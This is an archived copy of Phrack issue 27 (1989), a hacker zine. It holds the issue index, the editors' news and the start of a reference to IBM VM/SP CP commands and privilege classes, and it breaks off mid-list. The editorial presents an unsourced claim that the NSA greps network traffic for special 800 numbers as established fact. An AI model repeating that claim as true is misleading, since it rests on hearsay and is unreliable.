home *** CD-ROM | disk | FTP | other *** search
/ Group 42-Sells Out! - The Information Archive / Group 42 Sells Out (Group 42) (1996).iso / zines / phrack / phrack27.txt < prev    next >
Text File  |  1995-11-30  |  295KB  |  5,871 lines

  1.                                 
  2.                                ==Phrack Inc.==
  3.  
  4.                      Volume Three, Issue 27, File 1 of 11
  5.  
  6.                    Phrack Inc. Newsletter Issue XXVII Index
  7.                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8.                                 June 20, 1989
  9.  
  10.  
  11.      Greetings and welcome to Issue 27 of Phrack Inc.  The pressure is on with
  12. SummerCon '89 just a couple short days away.  We're sorry it has taken so long
  13. to get this issue out, but summer break has created more responsibilities and
  14. busy schedules than we have ever had to deal with while in school.  Still, I
  15. think you will agree that this issue was worth the wait.
  16.  
  17.      This issue we feature a new updated NUA and Datex-P list from Oberdaemon
  18. of Switzerland and Chapter 7 of the Future Transcendent Saga (taking into
  19. account that the SPAN and NSFnet files were chapters 5 and 6).  We also present
  20. the second part of the COSMOS file written by King Arthur.
  21.  
  22.      Before we get to the main contents of the issue, we have a few comments to
  23. make regarding security and Phrack Inc.'s Internet access;
  24.  
  25.      Thanks to a friend, we at Phrack Inc. have become aware of one of the main
  26. techniques that the National Security Agency (NSA) uses to perform surveillance
  27. on the wide area networks.
  28.  
  29.      In certain messages that certain government agencies distribute, special
  30. phone numbers are included; WATS (800) numbers, to be more specific.  As these
  31. messages are distributed around the continent via various netmail and file
  32. transfer schemes, they are passed through several surveillance stations.  All
  33. of their stations perform one function, and in Unix terms, that function is
  34. called "grep."
  35.  
  36.      Grep stands for G>lobal R>egular E>xpression search and P>rint.  The grep
  37. does simple string matching.  Every instance of these special 800-numbers in an
  38. email message (or batch of them) is flagged, recorded, and the record is mailed
  39. to certain intelligence agencies by the surveillance stations.
  40.  
  41.      Here are the networks that we are reasonably certain that this practice is
  42. performed on:
  43.  
  44. * USEnet  : Email is only checked in certain places, but ALL netnews (including
  45.             alt and any other nonstandard newsgroups) are flagged by a single
  46.             government domain SUN-3 that shall remain nameless.
  47. * ARPAnet : All mail going through a standard BBN (Bolt, Bernack, and
  48.             Neumann... a Cambridge/MIT spinoff) Internet controller will be
  49.             flagged, but the only information recorded by the controller is the
  50.             source and destination TCP/IP addresses of the message.  But when
  51.             you consider that this involves ***ALL*** DARPA mailing lists, you
  52.             get a visualization of the magnitude.  The reason more complex
  53.             information is NOT recorded is that this network is the only
  54.             AUTHORIZED place that these messages with the hot WATS are supposed
  55.             to appear.  You will see what this means in a moment.
  56. * BITnet  : Large IBM mainframe with I/O channel cycles to spare should have no
  57.             problem scanning mail from one of the most publically accessable
  58.             "free" networks.
  59. * Fidonet : The Secret Service scans this for credit card and other violations.
  60.             It is not too hard for them to check for the (800)'s, too.
  61. * W.Union : All international telex lines are scanned to match a whole lot of
  62.             stuff, especially drug-related information.  The phone numbers are
  63.             on their list.
  64.  
  65.      We have other suspicions, but we are withholding them for now.
  66.  
  67.      The other news is equally disturbing because it strikes us a little close
  68. to home.  We are temporarily losing our network access.  As of June 27, 1989
  69. through August 28, 1989 we will not have access to our accounts on UMCVMB
  70. mainframe system.  Make no attempt to mail us to our addresses there until
  71. August 28, 1989.  However, every cloud has a silver lining and this is no
  72. exception.  For networks people who wish to submit files to Phrack Inc. during
  73. this time period we proudly present our friend and associate, Hatchet Molly.
  74. He can be reached at "TK0GRM2@NIU.BITNET" and/or
  75. "TK0GRM2%NIU.BITNET@CUNYVM.CUNY.EDU".
  76.  
  77.      So here is to another great issue of Phrack Inc!
  78.  
  79.                Taran King                        Knight Lightning
  80.  
  81.                                  Hatchet Molly
  82.                               TK0GRM2@NIU.BITNET
  83.                       TK0GRM2%NIU.BITNET@CUNYVM.CUNY.EDU
  84. _______________________________________________________________________________
  85.  
  86. Table of Contents:
  87.  
  88. 1.  Phrack Inc. XXVII Index by Taran King and Knight Lightning
  89. 2.  Operating The IBM VM/SP CP by Taran King
  90. 3.  Introduction To MIDNET: Chapter Seven Of The FTS by Knight Lightning
  91. 4.  NUA List For Datex-P And X.25 Networks by Oberdaemon
  92. 5.  COSMOS:  COmputer System for Mainframe OperationS (Part Two) by King Arthur
  93. 6.  Looking Around In DECnet by Deep Thought
  94. 7.  The Making Of A Hacker by Framstag
  95. 8.  Sending Fakemail In Unix by Dark OverLord
  96. 9.  The Postal Inspection Service by Vendetta
  97. 10. Phrack World News XXVII/Part 1 by Knight Lightning
  98. 11. Phrack World News XXVII/Part 2 by Knight Lightning
  99. 12. Phrack World News XXVII/Part 3 by Knight Lightning
  100. _______________________________________________________________________________
  101.  
  102.  
  103.                                 ==Phrack Inc.==
  104.  
  105.                      Volume Three, Issue 27, File 2 of 12
  106.  
  107.  
  108.                           Operating the IBM VM/SP CP
  109.  
  110.              (IBM Virtual Machine System Product Control Program)
  111.  
  112.                      An information article researched by
  113.  
  114.                                   Taran King
  115.  
  116.                                  May 18, 1989
  117.  
  118.  
  119. This article is for the purpose of understanding the Control Program (CP)
  120. portion of IBM's VM/SP.  This is basically a separate section of VM/CMS known
  121. as CP (with full screen editors, the CP level is indicated in the lower right
  122. hand corner of the screen and for line-by-line editors, before the command line
  123. and after hitting carriage returns, it should say "CP") and it's purpose is to
  124. manage real resources.  Any command that involves something outside of your
  125. virtual machine must communicate with CP.  If CMS does not recognize a command
  126. you give it, it will give it to CP.
  127.  
  128. The user generally enters the CP stage after a program flops or if you get
  129. disconnected.  You can also enter the CP stage by hitting PA1 which is a
  130. function key of sorts.  PA1 toggles between CP and CMS while on-line and if you
  131. re-login after being disconnected, PA1 can be used besides the BEGIN command
  132. which will be spoken about later in this article.
  133.  
  134. Generally, VM/CMS systems are well equipped with help files so if anything I
  135. print becomes unclear to you, from CMS mode, type HELP CP XXX where XXX is the
  136. CP command you want information on.
  137.  
  138. To start this article off, I'm printing off the IBM-Defined Class and the
  139. Function Types as listed in the IBM VM/SP CP manual.  This essentially tells
  140. you what privileges you have with your assigned class.
  141.  
  142. ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
  143. IBM-Defined      Function         User &
  144.    Class           Type          Functions
  145. ~~~~~~~~~~~      ~~~~~~~~        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  146.      A               O           Operations:  The primary sysop can issue all
  147.                                  class A commands.  The class A user controls
  148.                                  the VM/SP system.  Class A is assigned to the
  149.                                  user at the VM/SP system console during IPL.
  150.                                  The primary sysop is responsible for the
  151.                                  availability of the VM/SP system and its
  152.                                  communication lines and resources.  In
  153.                                  addition, the class A user controls system
  154.                                  accounting, broadcast messages, virtual
  155.                                  machine performance options, and other
  156.                                  command operands that affect the overall
  157.                                  performance of the VM/SP.  The sysop controls
  158.                                  operation of the real machine using the
  159.                                  system control panel and console device.
  160.                                  NOTE:  The class A sysop who is automatically
  161.                                  logged on during CP initialization is
  162.                                  designated as the primary sysop.
  163.  
  164.      B               R           Resource:  The system resource operator can
  165.                                  issue all class B commands.  The class B user
  166.                                  controls allocation and deallocation of all
  167.                                  the real resources of the VM/SP system,
  168.                                  except those controlled by the primary sysop
  169.                                  and spooling operator.
  170.  
  171.      C               P           Programmer:  The system programmer can issue
  172.                                  all class C commands.  The class C user
  173.                                  updates certain functions of the VM/SP
  174.                                  system.  The system programmer can modify
  175.                                  real storage in the real machine.
  176.  
  177.      D               S           Spooling:  The spooling operator can issue
  178.                                  all class D commands.  The class D user
  179.                                  controls spool data files and specific
  180.                                  functions of the system's unit record
  181.                                  equipment.
  182.  
  183.      E               A           Analyst:  The system analyst can issue all
  184.                                  class E commands.  The class E user displays
  185.                                  the contents of real storage, performs the
  186.                                  functions required to generate saved systems
  187.                                  and discontiguous saved segments, and
  188.                                  controls the collecting and recording of
  189.                                  performance measurement data.  This class of
  190.                                  user can display specified real storage areas
  191.                                  on the virtual operator's console or on a
  192.                                  spooled virtual printer, but cannot modify
  193.                                  real storage.
  194.  
  195.      F               C           Customer Engineer:  The service
  196.                                  representative can issue all class F
  197.                                  commands.  The class F user obtains, and
  198.                                  examines, in detail, certain data about input
  199.                                  and output devices connected to the VM/SP
  200.                                  system.  The service representative can
  201.                                  establish extensive recording mode for one
  202.                                  I/O device at a time and can cause the
  203.                                  recording of repressible machine check errors
  204.                                  to be initiated or resumed.
  205.  
  206.      G               G           General:  The general user can issue all
  207.                                  class G commands.  The class G user controls
  208.                                  functions associated with the execution of
  209.                                  his virtual machine.  A general user cannot
  210.                                  display or modify real storage.
  211.  
  212.     ANY             ANY          The ANY classification is given to certain CP
  213.                                  commands that are available to any user.
  214.                                  These are primarily for the purpose of
  215.                                  gaining and relinquishing access to the VM/SP
  216.                                  system.
  217.  
  218. ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
  219.  
  220. The following is the list of commands available along with a brief description
  221. as to what they do and/or formatting and then ending with the IBM-Defined
  222. Class and Function Type.
  223.  
  224. * : From CP, one may use the * command to annotate the terminal console sheet
  225. ~   or the terminal display screen with a comment.  In other words, type * and
  226. then any string of characters you would, for some reason, to be present on the
  227. screen thereafter.
  228. Privilege Class:  ANY
  229. Function Type:  N/A
  230.  
  231. #CP : This command is used to execute a CP Command while in a virtual machine
  232. ~~~   command environment without first signaling attention to get to the CP
  233. command environment which means that when typing P <command> to perform a CP
  234. operation, CP directly receives the command whereas CP <command> merely queues
  235. the command from CP.
  236. Privilege Class:  ANY
  237. Function Type:  ANY
  238.  
  239. ACNT : The ACNT command is used to create accounting records for logged on
  240. ~~~~   users and to reset accounting data.  It also closes a spool file that
  241. is accumulating accounting records.
  242. Privilege Class:  A
  243. Function Type:  O
  244.  
  245. ADSTOP : The ADSTOP command is used to halt the execution of a virtual machine
  246. ~~~~~~   at a virtual instruction point.  The hexloc variable may be placed
  247. after the word ADSTOP which is a 6 character hexadecimal representation of the
  248. virtual instruction address where the execution is to be halted.  The OFF
  249. option of the ADSTOP command cancels any previous ADSTOP setting.
  250. Privilege Class:  G
  251. Function Type:  G
  252.  
  253. ATTN : Use the ATTN command to make an attention interruption pending at your
  254. ~~~~   virtual console.
  255. Privilege Class:  G
  256. Function Type:  G
  257.  
  258. AUTOLOG : This command allows the user to log on any virtual machine defined
  259. ~~~~~~~   in the directory.
  260. Privilege Level:  A, B
  261. Function Type:  O
  262.  
  263. BACKSPAC : The BACKSPAC command is used to restart or reposition the current
  264. ~~~~~~~~   output on a real punch or printer.
  265. Privilege Class:  D
  266. Function Type:  S
  267.  
  268. BEGIN or B : The BEGIN command by itself from CP mode will return the user to
  269. ~~~~~~~~~~   CMS mode in the place where he/she left off before he/she was
  270. disconnected or thrown into CP.  The BEGIN command can also be followed by a
  271. hex location as to where to start in the case of the user wanting to be doing
  272. something other than what was previously occurring.
  273. Privilege Class:  G
  274. Function Type:  G
  275.  
  276. CHANGE or CH : In use of the CHANGE command, there are subcommands with
  277. ~~~~~~~~~~~~   variables.  Generally, the "name" variable is 1 to 4 characters
  278. in length.  The following are the subcommands with functions and formatting:
  279.  
  280.   o  READER or RDR : changes reader spool files.
  281.   o  PRINTER or PRT : changes printer spool files.
  282.   o  PUNCH or PCH : changes punch spool files.
  283.   o  CLASS c1 : designates an existing class where c1 is a 1-character
  284.                 alphanumerical field from A to Z or 0 to 9.
  285.   o  spoolid : spoolid number of file that is to be changed.
  286.   o  FORM form1 : 1 to 8 character alphanumeric form name used to select files
  287.                   to be changed (form1).
  288.   o  ALL : changes all of your spool files.
  289.   o  HOLD : prevents a file from being printed, punched, or read until
  290.             released.
  291.   o  NOHOLD : releases the specified file from the user's HOLD status.
  292.   o  DIST dist : changes the distribution code to variable "dist".
  293.   o  COPY(*)nnn : specifies number of copies of the file you want spooled,
  294.                   which is valid only for printer or punch files.  "nnn" is a
  295.                   number from 1 to 255 and the "*" is  present in the case of
  296.                   a 3800 printer being used so that copies will be made in the
  297.                   printer internally.
  298.   o  FLASH name nnn : signifies that a form's overlay contained in the 3800
  299.                       printer is to be superimposed onto certain pages of
  300.                       output.  "nnn" is a number from 0 to 255 representing
  301.                       the number of copies to be superimposed.
  302.   o  MODIFY name (n) : allows text alteration by preventing information
  303.                        printing or by adding labels to output.  "n" selects a
  304.                        keyword in CHARS to be used for copy modification text.
  305.   o  CHARS name1 (name2(name3(name4)))
  306.      CHARS name1(CH names2(CH names3(CH names4))) : specifies character
  307.                        arrangement table when printing a file.  There can be
  308.                        up to 4 names.
  309.   o  FCB name : controls vertical spacing of output on a page.
  310.   o  FORM form2 : changes spool form name of file to form2.
  311.   o  NAME fn (ft) : assigns identification to spool file in CMS format
  312.                     filename and filetype.
  313.   o  NAME dsname : assigns identification to spool file in non-CMS format
  314.                    where "dsname" is from 1 to 24 characters, suitable for
  315.                    specifying OS or DOS files.
  316. Privilege Class:  S, G
  317. Function Type:  D, G
  318.  
  319. CLOSE or C : The CLOSE command terminates spooling activity on any virtual
  320. ~~~~~~~~~~   spooled unit record or console device.  It Contains the following
  321. subcommands to be followed by the letter C or the word CLOSE:
  322.  
  323.    o  READER or RDR
  324.    o  PRINTER or PRT
  325.    o  PUNCH or PCH
  326.    o  FORM form1
  327.    o  HOLD
  328.    o  NOHOLD
  329.    o  DIST dist
  330.    o  NAME fn (ft)
  331.    o  NAME dsname
  332.    o  vaddr : virtual address (cuu) of device to be closed.
  333.    o  CONSOLE : closes virtual machine's console spool file which makes it a
  334.                 printer spool file.
  335.    o  PURGE : closes and immediately purges from the virtual machine the
  336.               output spool files.  No output file is produced.
  337.    o  CHAIN : only valid for VM/SP HPO Release 4.2 and Profs Spool File
  338.               Enhancement PRPQ.  Indicates that the punchfile is to be
  339.               chained.
  340. Privilege Class:  G
  341. Function Type:  G
  342.  
  343. COMMANDS or COMM : Use COMMAND to list the commands and diagnose codes you are
  344. ~~~~~~~~~~~~~~~~   authorized to use.
  345. Privilege Class:  ANY
  346. Function Type:  ANY
  347.  
  348. COUPLE : Using the COUPLE command connects your virtual non-dedicated
  349. ~~~~~~   channel-to-channel device to another user's virtual device of the
  350. same type or to another one of your own virtual devices of the same type.  The
  351. format of this command is in the form of COUPLE vaddr1 TO userid vaddr2.  The
  352. variable vaddr1 is your virtual address and the variables userid vaddr2
  353. identify the userid and virtual address of that userid to be connected to.
  354. Privilege Class:  G
  355. Function Type:  G
  356.  
  357. CP : The CP command may precede the command to be processed, but it is not
  358. ~~   necessary.  Generally, the CP command is used from CMS mode to queue CP
  359. functions by typing CP <command>.
  360. Privilege Class:  ANY
  361. Function Type:  ANY
  362.  
  363. CPTRAP : The CPTRAP command creates a reader file of a selected trace table,
  364. ~~~~~~   CP interface, and virtual machine interface entries for problem
  365. determination.
  366. Privilege Class:  C
  367. Function Type:  P
  368.  
  369. DCP : This command displays the contents of real storage locations at the
  370. ~~~   terminal.
  371. Privilege Class:  C, E
  372. Function Type:  P
  373.  
  374. DEFINE or DEF : The DEFINE command in CP is used to alter your virtual machine
  375. ~~~~~~~~~~~~~   configuration or channel operating mode.  There are a LOT of
  376. subcommands that are used with the DEFINE command such as RDR or PRT or PCH
  377. and the list goes on and on.  If you want details, there is a help file (type
  378. HELP CP DEF) that is almost 600 lines that goes into detail on each
  379. subcommand.
  380. Privilege Class:  B, G
  381. Function Type:  R, G
  382.  
  383. DETACH or DET : The DETACH command is used to remove a virtual device from the
  384. ~~~~~~~~~~~~~   virtual machine.  The subcommands are as follows:
  385.  
  386.   o  vaddr (vaddr...) : used for multiple addresses to be detached where vaddr
  387.                         is the virtual address (cuu) of the device to be
  388.                         detached.
  389.   o  vaddr-vaddr : used to detach a range of addresses.
  390.   o  CHANNEL c : detaches the real address of the channel.
  391. Privilege Class:  B, G
  392. Function Type:  R, G
  393.  
  394. DIAL : Using the DIAL command logically connects a switched line, leased line,
  395. ~~~~   locally attached, or remote Binary Synchronous (BSC) terminal to a
  396. previously logged-on multiple-access virtual machine.  It is in the format of
  397. DIAL userid (vaddr) where the userid is that to be connected to and the
  398. vaddr is the optional virtual address.
  399. Privilege Class:  ANY
  400. Function Type:  ANY
  401.  
  402. DISABLE : The DISABLE command prevents low speed communications lines from
  403. ~~~~~~~   accessing the system.
  404. Privilege Class:  A, B
  405. Function Type:  R
  406.  
  407. DISCONN or DISC : The DISCONNECT command is used to disconnect your terminal
  408. ~~~~~~~~~~~~~~~   from the system while the virtual machine continues
  409. operation.  Using the DISC HOLD or DISC HO option, you specify that the
  410. communications line is not to be disabled which allows you to avoid re-dialing
  411. the system.
  412. Privilege Class:  ANY
  413. Function Type:  ANY
  414.  
  415. DISPLAY or D : The DISPLAY command allows you to display virtual machine
  416. ~~~~~~~~~~~~   components at your terminal.  Depending on what variable
  417. follows the D or DISPLAY command from CP, you can display virtual storage
  418. locations, storage keys, general registers, floating-point registers, control
  419. registers, vector registers, VAC (Vector Activity Counter), VSR (Vector Status
  420. Register), VMR (Vector Mask Register), PSW (Program Status Word), CAW (Channel
  421. Address Word), and CSW (Channel Status Word).
  422. Privilege Class:  G
  423. Function Type:  G
  424.  
  425. DMCP : This command prints the contents of real storage locations on a user's
  426. ~~~~   virtual spooled printer.
  427. Privilege Class:  C, E
  428. Function Type:  P
  429.  
  430. DRAIN : The DRAIN command stops spooling operations on a specified real unit's
  431. ~~~~~   read devices after the file currently being processed has been
  432. completed.
  433. Privilege Class:  D
  434. Function Type:  S
  435.  
  436. DUMP or DU : Use the DUMP command to print the contents of various components
  437. ~~~~~~~~~~   of the virtual machine on the virtual spooled printer.  Depending
  438. on what variable is placed after the DUMP or DU command, the items printed
  439. include virtual PSW (Program Status Word), general registers, floating-point
  440. registers, control registers, storage keys, and virtual storage locations.
  441. Privilege Class:  G
  442. Function Type:  G
  443.  
  444. ECHO or EC : Defaulted at 1, the ECHO command places the terminal in the echo
  445. ~~~~~~~~~~   environment in which any line entered is transmitted unchanged
  446. back to the terminal a specified number of times, depending on the variable
  447. entered immediately after the word ECHO or EC.
  448. Privilege Type:  G
  449. Function Type:  G
  450.  
  451. ENABLE : Use the ENABLE command to enable the previously disabled or nonabled
  452. ~~~~~~   devices so users may access the system.
  453. Privilege Class:  A, B
  454. Function Type:  R
  455.  
  456. EXTERNAL or EXT : The EXTERNAL command allows the user to simulate an external
  457. ~~~~~~~~~~~~~~~   interrupt to the virtual machine and to return control to
  458. that machine.  The hexadecimal code following the word EXTERNAL or EXT is
  459. associated with the external interrupt, the default being the number 40 which
  460. is associated with the external interrupt button on a system console.
  461. Privilege Class:  G
  462. Function Type:  G
  463.  
  464. FLUSH : The FLUSH command halts and immediately purges on hold the current
  465. ~~~~~   output on a specified unit record device.
  466. Privilege Class:  D
  467. Function Type:  S
  468.  
  469. FORCE : This command forces a logoff of any user of the system.
  470. ~~~~~
  471. Privilege Class:  A
  472. Function Type:  O
  473.  
  474. FREE : Use the FREE command to remove a set of spool files belonging to a
  475. ~~~~   specified user from a system hold status.
  476. Privilege Class:  D
  477. Function Type:  S
  478.  
  479. HALT : The HALT command terminates any active channel program on a specified
  480. ~~~~   real device.
  481. Privilege Class:  A
  482. Function Type:  O
  483.  
  484. HOLD : The HOLD command places user spool files in a system hold status.
  485. ~~~~
  486. Privilege Class:  D
  487. Function Type:  S
  488.  
  489. INDICATE or IND : At your terminal, you can display the use of and contention
  490. ~~~~~~~~~~~~~~~   for major system resources with the INDICATE command.  The
  491. following variables that follow the word INDICATE or IND show the following
  492. data:
  493.  
  494.   o  LOAD : shows number of users in queue 1 and queue 2, the usage of real
  495.             storage, and the ratio of active users to users being serviced.
  496.             This is done by returning values that indicate operating load on
  497.             the system.
  498.   o  USER : displays the amounts of system resources used by your virtual
  499.             machine in the current terminal session.
  500. Privilege Class:  A, E, G
  501. Function Type:  O, A, G
  502.  
  503. IPL or I : Generally used to return to CMS via the IPL CMS  or I CMS command,
  504. ~~~~~~~~   the IPL command simulates an initial program load function for a
  505. virtual machine.  Subcommands are as follows:
  506.  
  507.   o  vaddr : virtual address (cuu) of the device that contains the nucleus to
  508.              be loaded.
  509.   o  cylno : cylinder containing the IPL data which defaults to 0.
  510.   o  nnnnn : block address containing the IPL data which defaults to 0.
  511.   o  CLEAR : sets virtual storage space to binary zeros before the operating
  512.              system is loaded.
  513.   o  NOCLEAR : allows contents of your virtual storage space to remain
  514.                unchanged prior to program load.
  515.   o  STOP : halts the virtual machine during the IPL procedure just before the
  516.             initial PSW is loaded.
  517.   o  ATTN : generates an attention interrupt to the virtual machine during the
  518.             IPL procedure.
  519.   o  PARM p1 (p2...) : processes up to 64 bytes of data to your virtual
  520.                        machine's general registers starting with the high
  521.                        order byte of general register 0.
  522.   o  systemname : simulates IPL function when loading a named system that was
  523.                   previously saved.
  524. Privilege Class:  G
  525. Function Type:  G
  526.  
  527. LINK : The LINK command is used to make a device that is associated with
  528. ~~~~   another virtual machine available at your virtual machine configuration
  529. based upon info in that user's directory entry.  This command is in the format
  530. of LINK TO userid vaddr1 AS vaddr2 (mode) ((PASS=) password(1)).
  531. Privilege Class:  G
  532. Function Type:  G
  533.  
  534. LOADBUF : On a 1403 printer, the LOADBUF command loads the Universal Character
  535. ~~~~~~~   Set (UCS) with a specified print train or chain image.  On a
  536. 3203, 3211, 3212, 4245, or 4248 printer, it loads the UCS or the Forms Control
  537. Buffer (FCB) with a specified image.  On a 3289 Model 4 printer, it loads the
  538. Font Offset Buffer (FOB) with the image print belt and the FCB.
  539. Privilege Class:  D
  540. Function Type:  S
  541.  
  542. LOADVFCB : This command specifies the forms control buffer image for different
  543. ~~~~~~~~   virtual spooled printers.  The variables that follow it include:
  544.  
  545.   o  vaddr
  546.   o  FCB : required reserved keyword meaning Forms Control Buffer.
  547.   o  name : a name that is system defined.
  548.   o  INDEX (nn) : place initial printing position in number nn for the 3211
  549.                   printer.
  550. Privilege Class:  G
  551. Function Type:  G
  552.  
  553. LOCATE : Use the LOCATE command to find the addresses of CP control blocks
  554. ~~~~~~   associated with a particular user, a user's device, or a real system
  555. device.
  556. Privilege Class:  C, E
  557. Function Type:  P
  558.  
  559. LOCK : This command permanently locks in selected pages of real storage.
  560. ~~~~
  561. Privilege Class:  A
  562. Function Type:  O
  563.  
  564. LOGOFF or LOGOUT or LOG : Used to terminate a virtual machine session and
  565. ~~~~~~~~~~~~~~~~~~~~~~~   disconnect your virtual machine from the system,
  566. this command can be used with the HOLD option (i.e.  LOG HOLD) for retaining
  567. the connection allowing for a switched communications line to enable one to
  568. log on without re-dialing the system.
  569. Privilege Class:  ANY
  570. Function Type:  ANY
  571.  
  572. LOGON or LOGIN or L : Obvious enough, the LOGIN or LOGON command is used to
  573. ~~~~~~~~~~~~~~~~~~~   identify yourself to the system and to access that
  574. system.  Following the words LOGIN or LOGON or L, type your userid which is
  575. the identifier assigned to you in the system.  If the system you are logging
  576. onto does NOT have password suppression, your password can follow directly
  577. after your userid.  NOTE:  If the system you are on does have password
  578. suppression (i.e.  it does not echo to your screen what you type when you type
  579. your password), you will get a system error message if you try to put it on
  580. the same line as your userid.  The NOIPL option, which would follow your
  581. password and userid, specifies that the IPL device or name in the directory
  582. should not be used for an automatic IPL.
  583. Privilege Class:  ANY
  584. Function Type:  ANY
  585.  
  586. MESSAGE or MSG or M : Use the MESSAGE command to transmit message text to a
  587. ~~~~~~~~~~~~~~~~~~~   specified userid or to the primary system operator
  588. userid.  MSG userid msgtext sends msgtext to the userid specified after
  589. userid. If userid is replaced with *, the text is sent to yourself.  Also, if
  590. the userid is replaced with OPERATOR, the message text is sent to the primary
  591. system operator regardless of his userid.
  592. Privilege Class:  A, B, ANY
  593. Function Type:  O, ANY
  594.  
  595. MIGRATE : The MIGRATE command activates the normal page/swap table migration
  596. ~~~~~~~   routines or forces a particular user's pages to a secondary device
  597. even if that user is currently active.
  598. Privilege Class:  A
  599. Function Type:  O
  600.  
  601. MONITOR : To initiate or override the system-generated function or to
  602. ~~~~~~~   terminate the recording of events occurring in the real machine, use
  603. the MONITOR command.
  604. Privilege Class:  A, E
  605. Function Type:  O
  606.  
  607. MSGNOH : The MSGNOH command allows a service virtual machine to send messages
  608. ~~~~~~   to specified users without the standard header associated with the
  609. MESSAGE command.
  610. Privilege Class:  B
  611. Function Type:  R
  612.  
  613. NETWORK : The NETWORK command allows you to load, dump and control operation
  614. ~~~~~~~   of a 3704 or 3705 and to control operation of a 3725 control program
  615. operating in 270x emulation mode (EP).  Also, it allows control of remote 3270
  616. devices via binary synchronous lines.
  617. Privilege Class:  A
  618. Function Type:  O
  619.  
  620. NOTREADY or NOTR : Using the NOTREADY command causes the virtual device, which
  621. ~~~~~~~~~~~~~~~~   is specified after the NOTREADY statement via cuu address,
  622. to appear as if it had changed from ready to not ready status.
  623. Privilege Class:  G
  624. Function Type:  G
  625.  
  626. ORDER or ORD : ORDER is used to place your closed spool files in a specific
  627. ~~~~~~~~~~~~   order by device type.  These spool files include READER,
  628. PRINTER, and PUNCH files and can be sorted by CLASS, FORM, and spoolid.
  629. Privilege Class:  D, G
  630. Function Type:  S, G
  631.  
  632. PER : PER allows one to monitor certain events as they occur during program
  633. ~~~   execution in the user's virtual machine.  This command can monitor the
  634. fetching and execution of an instruction, the execution of a successful branch
  635. instruction, the instruction of an instruction that alters a specific general
  636. purpose register, and the execution of an instruction in the virtual machine
  637. that alters storage.
  638. Privilege Class:  A, B, C, D, E, F, G
  639. Function Type:  G
  640.  
  641. PURGE or PUR : Use the PURGE command to remove your own closed spool files
  642. ~~~~~~~~~~~~   from the system before they are printed or punched by the
  643. spooling devices, or before they are read by a user.  The spool file
  644. specifications include READER, PRINTER, and PUNCH files as well as the ALL
  645. option which purges all of the above mentioned files.
  646. Privilege Class:  D, G
  647. Function Type:  S, G
  648.  
  649. QUERY or Q : Also available in CMS mode, the QUERY command is used to
  650. ~~~~~~~~~~   determine your system status and machine configuration.
  651. Although there are far too many subcommands of the QUERY command, the
  652. following is a list of items that may be queried.  I recommend, for full
  653. detail, using the HELP CP QUERY command as it is quite thorough (over 1000
  654. lines) in explaining the QUERY command.
  655.  
  656.   o  The time you have used during a terminal session.
  657.   o  The number of closed input and output spool files associated with
  658.      your virtual machine.
  659.   o  The current settings of the color and/or extended highlight values
  660.      in effect for your virtual machine console.
  661.   o  The current settings of the SET command functions.
  662.   o  The current settings of the TERMINAL command functions.
  663.   o  The status of all the devices on your virtual machine.
  664.   o  The channel operating mode of your virtual machine, whether
  665.      block-multiplexer or selector.
  666.   o  A listing of all users who are linked to a given virtual address,
  667.      together with their device addresses and access modes.
  668.   o  Display of the secondary user (secuser) that is specified in the
  669.      CONSOLE directory statement.
  670.   o  Identification and attributes associated with your virtual
  671.      PRINTER, PUNCH, and READER spool files.
  672.   o  The identification of your virtual processor.
  673.   o  The mode of processor operation of your VM/SP HPO installation:
  674.      uniprocessor mode (UP), attached processor mode (AP), or
  675.      multiprocessor mode (MP).
  676.   o  The userid and system identifier.
  677.   o  A listing of the PER traceset elements.
  678.   o  The log messages of the day.
  679.   o  The names of the users that are logged on.
  680.   o  The number of users that are logged on or dialed to the system.
  681.  
  682. NOTE:  There are other operands you can use with the QUERY command if you
  683.        have the privilege class required to use them.
  684. Privilege Class:  A, B, C, D, E, F, G
  685. Function Type:  O, R, P, S, A, C, G
  686.  
  687. QVM : Use this command to request the transition from the VM/SP environment to
  688. ~~~   native mode for a particular virtual machine.
  689. Privilege Class:  A
  690. Function Type:  O
  691.  
  692. READY : In the format of READY vaddr, this command is used to set a device-end
  693. ~~~~~   interruption pending for the specified virtual device.
  694. Privilege Class:  G
  695. Function Type:  G
  696.  
  697. REPEAT : Use the REPEAT command to increase the number of copies of an output
  698. ~~~~~~   file or to place the current output file in a hold status increasing
  699. or not increasing the number of copies to be created.
  700. Privilege Class:  D
  701. Function Type:  S
  702.  
  703. REQUEST or REQ : Simply use the REQUEST command to make an attention interrupt
  704. ~~~~~~~~~~~~~~   at your virtual console.
  705. Privilege Class:  G
  706. Function Type:  G
  707.  
  708. RESET : Also in the format of RESET vaddr, this command is used to clear all
  709. ~~~~~   pending interrupts from the specified virtual device.
  710. Privilege Class:  G
  711. Function Type:  G
  712.  
  713. REWIND or REW : The REWIND command is used to rewind a real tape unit attached
  714. ~~~~~~~~~~~~~   to your virtual machine at a specified virtual device address
  715. in the format REWIND vaddr.
  716. Privilege Class:  G
  717. Function Type:  G
  718.  
  719. SAVESYS : This command allows you to save a virtual machine storage space with
  720. ~~~~~~~   registers and the PSW as they currently exist.  It is used in the
  721. process of creating named systems.
  722. Privilege Class:  E
  723. Function Type:  A
  724.  
  725. SCREEN or SCRE : Use the SCREEN command to alter or change any extended color
  726. ~~~~~~~~~~~~~~   and/or extended highlight definitions for your virtual
  727. machine console.  You may issue the command from any IBM supported terminal or
  728. from a PROFILE EXEC because the SCREEN command is not device dependent.
  729. However, the SCREEN command is only valid when the Extended Color Feature has
  730. been applied to the terminal controller.
  731.  
  732. You can assign extended color and extended highlighting values to six distinct
  733. display screen areas:  the input area, the system status area, and the output
  734. area that encompasses three other areas: CP output, virtual machine output,
  735. virtual machine output, and an input redisplay area.  The physical attributes
  736. of 3270 Information Display station screens vary according to model.
  737.  
  738. Because this command mainly applies to people who are not on dial-up, I have
  739. elected not to detail all of the variables available with the SCREEN command.
  740. Once again, I recommend you using HELP CP SCREEN for details.
  741. Privilege Class:  G
  742. Function Type:  G
  743.  
  744. SEND : Using the Single Console Image Facility, the SEND command is used to
  745. ~~~~   pass commands and message replies for the secondary user's console to
